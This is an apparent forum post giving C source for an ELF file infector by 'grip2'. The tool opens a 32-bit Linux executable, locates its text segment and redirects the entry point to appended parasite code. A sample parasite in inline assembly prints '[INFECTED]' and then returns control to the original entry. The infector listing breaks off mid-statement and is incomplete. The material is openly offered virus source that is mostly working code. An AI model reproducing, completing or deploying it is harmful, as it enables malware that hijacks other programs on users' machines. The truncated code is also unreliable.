文章作者：grip2


[code]/*
* gei - ELF Infector v0.0.1
* written by grip2 <gript2@hotmail.com>
*/

#include <elf.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <stdio.h>
#include <unistd.h>
#include <string.h>

#include "gparasite.h"

#define PAGE_SIZE 4096
#define PAGE_ALIGN(a) (((a) + PAGE_SIZE - 1) & ~(PAGE_SIZE - 1))
#define TMP_FILE "/tmp/.tmp.v"

int main(int argc, char *argv[])
{
     int fd = -1;
     int tmp_fd = -1;
     Elf32_Ehdr *ehdr = NULL;
     Elf32_Phdr *phdr;
     Elf32_Shdr *shdr;
     int i;
     int txt_index;
     struct stat stat;

     if (argc != 2) {
          fprintf(stderr,
              "gei - ELF Infector v0.0.1 written by grip2 <gript2@hotmail.com>\n");
          fprintf(stderr, "Usage: %s <elf-exec-file>\n", argv[0]);
          goto err;
     }

     fd = open(argv[1], O_RDWR);
     if (fd == -1) {
          perror(argv[1]);
          goto err;
     }

     if (fstat(fd, &stat) == -1) {
          perror("fstat");
          goto err;
     }

#ifndef NDEBUG
     printf("file size: %lu\n", stat.st_size);
#endif

     ehdr = mmap(0, stat.st_size, PROT_WRITE|PROT_READ, MAP_SHARED, fd, 0);
     if (ehdr == MAP_FAILED) {
          perror("mmap ehdr");
          goto err;
     }
     
     /* Check ELF magic-ident */
     if (ehdr->e_ident[EI_MAG0] != 0x7f
          || ehdr->e_ident[EI_MAG1] != &#39;E&#39;
          || ehdr->e_ident[EI_MAG2] != &#39;L&#39;
          || ehdr->e_ident[EI_MAG3] != &#39;F&#39;
          || ehdr->e_ident[EI_CLASS] != ELFCLASS32
          || ehdr->e_ident[EI_DATA] != ELFDATA2LSB
          || ehdr->e_ident[EI_VERSION] != EV_CURRENT
          || ehdr->e_type != ET_EXEC
          || ehdr->e_machine != EM_386
          || ehdr->e_version != EV_CURRENT
          ) {
          fprintf(stderr, "File type not supported\n");
          goto err;
     }

#ifndef NDEBUG
     printf("e_phoff: %08x\ne_shoff: %08x\n",
              ehdr->e_phoff, ehdr->e_shoff);
     printf("e_phentsize: %08x\n", ehdr->e_phentsize);
     printf("e_phnum: %08x\n", ehdr->e_phnum);
     printf("e_shentsize: %08x\n", ehdr->e_shentsize);
     printf("e_shnum: %08x\n", ehdr->e_shnum);
#endif

     /* Get program header and section header start address */
     phdr = (Elf32_Phdr *) ((unsigned long) ehdr + ehdr->e_phoff);
     shdr = (Elf32_Shdr *) ((unsigned long) ehdr + ehdr->e_shoff);

     /* Locate the text segment */
     txt_index = 0;
     while (1) {
          if (txt_index == ehdr->e_phnum) {
              fprintf(stderr, "Invalid e_phnum, text segment not found.\n");
              goto err;
          }
          if (phdr[txt_index].p_type == PT_LOAD
              && phdr[txt_index].p_flags == (PF_R|PF_X)) { /* text segment */
#ifndef NDEBUG
              printf("text segment file offset: %u\n", phdr[txt_index].p_offset);
#endif
              break;
          }
          txt_index++;
     }     

     /* Modify the entry point of the ELF */
     unsigned long org_entry = ehdr->e_entry;
     ehdr->e_entry = phdr[txt_index].p_vaddr + phdr[txt_index].p_filesz;

     /* Get parasite code size */
     int org_code_size =

parasite_code例子

复制内容到剪贴板

代码:

---------------------------------------------------------------
/* gparasite.h*/
#ifndef _G2_PARASITE_CODE_
#define _G2_PARASITE_CODE_

#define PARACODE_RETADDR_ADDR 99
void parasite_code(void);
void parasite_code_end(void);

#endif
---------------------------------------------------------------
/* gparasite.c */
/*
* A parasite code sample in C
* written by grip2 <[email]gript2@hotmail.com[/email]>
*/

#include <linux/types.h>
#include <linux/unistd.h>

static inline _syscall3(int,write,int,fd,const void *,buf,off_t,count)

int errno;
void parasite_code(void)
{
     long long str2;
     long long str;
     char *s = (char *) &str;

     __asm__ __volatile__ (
          "push %%eax\n\t"
          "push %%ecx\n\t"
          "push %%edx\n\t"
          ::);

     s[0] = &#39;[&#39;;
     s[1] = &#39;I&#39;;
     s[2] = &#39;N&#39;;
     s[3] = &#39;F&#39;;
     s[4] = &#39;E&#39;;
     s[5] = &#39;C&#39;;
     s[6] = &#39;T&#39;;
     s[7] = &#39;E&#39;;
     s[8] = &#39;D&#39;;
     s[9] = &#39;]&#39;;
     s[10] = &#39;*&#39;;
     s[11] = &#39;\n&#39;;
     write(1, s, 12);

     __asm__ __volatile__ (
          "pop %%edx\n\t"
          "pop %%ecx\n\t"
          "pop %%eax\n\t"
          "add $0xc, %%esp\n\t"
          "pop %%ebx\n\t"
          "pop %%ebp\n\t"
          "push $0xAABBCCDD\n\t" /* push ret_addr */
          "ret"
          ::);

     str = str2 = 0;
}
void parasite_code_end(void) {}